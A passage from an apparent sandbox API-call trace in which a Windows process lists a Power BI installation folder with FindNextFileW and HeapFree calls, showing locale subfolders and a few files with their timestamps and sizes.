ftLastAccessTime.dwLowDateTime=0x133819a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133819a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg", cAlternateFileName="")) returned 1 [0163.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0163.738] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x133a7bf5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x133a7bf5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133cde53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4090, dwReserved0=0x0, dwReserved1=0x0, cFileName="BI-Report.png", cAlternateFileName="BI-REP~1.PNG")) returned 1 [0163.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0163.740] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9a9d821, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133cde53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133cde53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs", cAlternateFileName="")) returned 1 [0163.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0163.993] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a6473, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da", cAlternateFileName="")) returned 1 [0163.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0163.996] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133f40a9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133f40a9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de", cAlternateFileName="")) returned 1 [0163.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0163.997] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf46b8986, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el", cAlternateFileName="")) returned 1 [0163.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0163.999] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7582db3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es", cAlternateFileName="")) returned 1 [0164.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.001] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1b0f72e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13440553, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13440553, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et", cAlternateFileName="")) returned 1 [0164.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.003] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6d2a978, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1341a2e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1341a2e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eu", cAlternateFileName="")) returned 1 [0164.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.005] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x138defa8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x138defa8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi", cAlternateFileName="")) returned 1 [0164.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.008] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13440553, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13440553, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr", cAlternateFileName="")) returned 1 [0164.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.009] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9ac3a61, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13aced2b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13aced2b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="gl", cAlternateFileName="")) returned 1 [0164.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.011] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4a98712, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13a8299e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13a8299e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he", cAlternateFileName="")) returned 1 [0164.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.013] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa806c3d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1428e945, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1428e945, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hi", cAlternateFileName="")) returned 1 [0164.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.015] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7beb2bc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13b67741, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13b67741, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr", cAlternateFileName="")) returned 1 [0164.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.018] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6164f96, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14648313, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14648313, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu", cAlternateFileName="")) returned 1 [0164.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.019] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1434d390, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1434d390, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="id", cAlternateFileName="")) returned 1 [0164.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.021] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf964b3dd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14969496, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14969496, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it", cAlternateFileName="")) returned 1 [0164.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.330] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf15d84bd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x146e0bdc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x146e0bdc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja", cAlternateFileName="")) returned 1 [0164.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.331] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfae6f174, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14b330aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14b330aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kk", cAlternateFileName="")) returned 1 [0164.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.333] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf17ee5c3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14ac0994, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14ac0994, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko", cAlternateFileName="")) returned 1 [0164.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.335] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7b529d9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x152a6704, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x152a6704, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt", cAlternateFileName="")) returned 1 [0164.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.337] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf035e09d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1525a179, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1525a179, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv", cAlternateFileName="")) returned 1 [0164.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.339] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42b29f3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf42d8c51, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x15f460, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerBI.Diagnostics.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0164.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.341] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x718b80, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15a3fea8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15a3fea8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl", cAlternateFileName="")) returned 1 [0164.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.343] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15b71118, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15b71118, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="no", cAlternateFileName="")) returned 1 [0164.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.345] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf44c8b33, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15b24c93, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15b24c93, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl", cAlternateFileName="")) returned 1 [0164.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.347] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff0bc27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15bbd5ad, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15bbd5ad, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt", cAlternateFileName="")) returned 1 [0164.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.349] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf475131d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15be380c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15be380c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0164.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.351] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6ac83cd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15d3adab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15d3adab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro", cAlternateFileName="")) returned 1 [0164.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.353] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe00baf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15d14b21, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15d14b21, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru", cAlternateFileName="")) returned 1 [0164.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.355] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6c6bda4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15e92299, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15e92299, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk", cAlternateFileName="")) returned 1 [0164.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.356] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1b359a5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15e45dad, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15e45dad, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl", cAlternateFileName="")) returned 1 [0164.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.358] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a2a905, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15f04999, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15f04999, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-cyrl", cAlternateFileName="")) returned 1 [0164.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.360] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa879350, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x160a83ba, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x160a83ba, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-latn", cAlternateFileName="")) returned 1 [0164.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.362] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf45f9db0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15ede724, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15ede724, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0164.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.364] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16035c5a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16035c5a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv", cAlternateFileName="")) returned 1 [0164.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.365] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c66c57, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16166f59, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16166f59, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="th", cAlternateFileName="")) returned 1 [0164.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.742] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1de43d5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16140cde, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16140cde, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr", cAlternateFileName="")) returned 1 [0164.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0164.744] FindNextFileW (in: hFindFile=0x7279c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7b9ee02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x161d962a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x161d962a, ftLastWriteTime.dwHighDateTime=0x1d327e8, 